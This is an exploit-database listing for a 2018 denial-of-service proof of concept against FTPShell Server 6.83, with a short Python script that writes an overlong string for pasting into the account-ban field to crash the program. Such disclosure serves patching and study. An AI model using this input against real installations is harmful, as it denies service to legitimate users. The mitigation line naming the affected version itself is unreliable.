header-logo
Suggest Exploit
vendor:
FTPShell Server
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: FTPShell Server
Affected Version From: 6.83
Affected Version To: 6.83
Patch Exists: YES
Related CWE: N/A
CPE: a:ftpshell:ftpshell_server
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64 Service Pack 1
2018

FTPShell Server 6.83 – Denial of Service (PoC)

A denial of service vulnerability exists in FTPShell Server 6.83 when a maliciously crafted string is sent to the application. An attacker can leverage this vulnerability to crash the application, denying service to legitimate users.

Mitigation:

Upgrade to the latest version of FTPShell Server 6.83 or later.
Source

Exploit-DB raw data:

#Exploit Title: FTPShell Server 6.83 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-20
#Vendor Homepage: http://www.ftpshell.com/index.htm
#Software Link: http://www.ftpshell.com/downloadserver.htm
#Tested Version: 6.83
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: FTPShell_Server_6.83.py
#2.- Open ftpshell.txt and copy content to clipboard
#3.- Open FTPShell Server
#4.- Select "Manage FTP Accounts"
#5.- Select "Add Account Name" > in "Account name to ban" Paste Clipboard
#6.- Click on "Ok"
#7.- Crashed

cod = "\x41" * 417	

f = open('ftpshell.txt', 'w')
f.write(cod)
f.close()